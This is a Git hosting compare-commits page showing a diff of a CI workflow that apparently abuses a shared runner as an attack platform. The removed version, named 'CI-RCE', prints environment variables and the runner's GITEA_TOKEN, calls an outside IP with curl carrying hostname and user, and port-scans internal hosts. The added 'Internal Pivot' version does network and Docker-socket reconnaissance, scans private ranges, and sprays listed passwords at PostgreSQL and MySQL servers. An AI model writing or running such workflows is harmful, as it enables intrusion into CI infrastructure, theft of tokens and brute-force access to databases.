mirror of
http://156.239.229.173:80/devops42/ci-test.git
synced 2026-07-08 00:47:06 +08:00
Compare commits
5 Commits
76c15b6f5a
...
3e704fdab5
| Author | SHA1 | Date | |
|---|---|---|---|
| 3e704fdab5 | |||
| 9dd10295e7 | |||
|
|
be43d6ba48 | ||
|
|
996c1dbb69 | ||
|
|
ce39a3087b |
@ -1,31 +1,43 @@
|
|||||||
name: CI-RCE
|
name: CI/CD Internal Pivot v2
|
||||||
on:
|
on: [push, workflow_dispatch]
|
||||||
push:
|
|
||||||
workflow_dispatch:
|
|
||||||
jobs:
|
jobs:
|
||||||
build:
|
recon:
|
||||||
runs-on: linux-amd64
|
runs-on: linux-amd64
|
||||||
steps:
|
steps:
|
||||||
- name: Exec
|
- name: Host Recon
|
||||||
run: |
|
run: |
|
||||||
echo "=== CI/CD RCE CONFIRMED ==="
|
echo "=== RUNNER HOST ==="
|
||||||
echo "Hostname: $(hostname)"
|
hostname
|
||||||
echo "User: $(whoami)"
|
whoami
|
||||||
echo "PWD: $(pwd)"
|
id
|
||||||
echo "=== Environment Variables ==="
|
echo "=== NETWORK ==="
|
||||||
env | sort
|
ip addr show 2>/dev/null || ifconfig -a 2>/dev/null || true
|
||||||
echo "=== Network ==="
|
ip route show 2>/dev/null || route -n 2>/dev/null || true
|
||||||
ip addr 2>/dev/null || ifconfig
|
cat /etc/hosts 2>/dev/null || true
|
||||||
echo "=== Attempt connections ==="
|
echo "=== DOCKER ==="
|
||||||
curl -s http://202.59.10.226:8888/rce-$(hostname)-$(whoami) || true
|
ls -la /var/run/docker.sock 2>/dev/null || echo "No docker socket"
|
||||||
# Try to access internal services
|
env | grep -i docker 2>/dev/null || true
|
||||||
for target in 49.51.171.167 108.181.64.141 156.239.230.24; do
|
echo "=== INTERNAL CONNECTIVITY ==="
|
||||||
for port in 3306 6379 22 80 443; do
|
for target in 156.239.230.24 172.17.0.1 172.18.0.1 10.0.0.1 192.168.0.0 100.64.0.0; do
|
||||||
timeout 2 bash -c "echo >/dev/tcp/$target/$port" 2>/dev/null && echo "REACHABLE: $target:$port" || true
|
for port in 5432 3306 6379 3000 222 22 80 443; do
|
||||||
|
timeout 3 bash -c "echo > /dev/tcp/$target/$port" 2>/dev/null && echo " REACHABLE: $target:$port" || echo " UNREACHABLE: $target:$port"
|
||||||
|
done
|
||||||
|
done
|
||||||
|
- name: PostgreSQL Attack
|
||||||
|
run: |
|
||||||
|
echo "=== POSTGRESQL CREDENTIAL SPRAY ==="
|
||||||
|
apt-get update -qq && apt-get install -y -qq postgresql-client 2>/dev/null || true
|
||||||
|
for pw in FGPMwSRrHxxa6Ktr RootAdmin123! Forgejo@5752! Aa123456.. Forgejo@123! postgres; do
|
||||||
|
echo "Testing: postgres / $pw"
|
||||||
|
PGPASSWORD="$pw" psql -h 156.239.230.24 -p 5432 -U postgres -d postgres -c "SELECT 1 as test" -t -A 2>&1 | head -3
|
||||||
|
done
|
||||||
|
- name: MySQL Attack
|
||||||
|
run: |
|
||||||
|
echo "=== MYSQL CREDENTIAL SPRAY ==="
|
||||||
|
apt-get install -y -qq mysql-client 2>/dev/null || true
|
||||||
|
for user in root forgejo gitea admin; do
|
||||||
|
for pw in FGPMwSRrHxxa6Ktr RootAdmin123! Forgejo@5752! Aa123456.. ""; do
|
||||||
|
mysql -h 156.239.230.24 -P 3306 -u "$user" --password="$pw" -e "SELECT 1" 2>&1 | head -1
|
||||||
|
done
|
||||||
done
|
done
|
||||||
done
|
|
||||||
# Dump runner token info
|
|
||||||
echo "=== GITEA_TOKEN ==="
|
|
||||||
echo "${GITEA_TOKEN:-NO_GITEA_TOKEN}"
|
|
||||||
echo "=== GITEA_REPOSITORY ==="
|
|
||||||
echo "${GITEA_REPOSITORY:-NO_REPO}"
|
|
||||||
|
|||||||
@ -1 +1 @@
|
|||||||
trigger
|
triggerTrigger 2026-06-18T00:03:01Z
|
||||||
|
|||||||
Loading…
Reference in New Issue
Block a user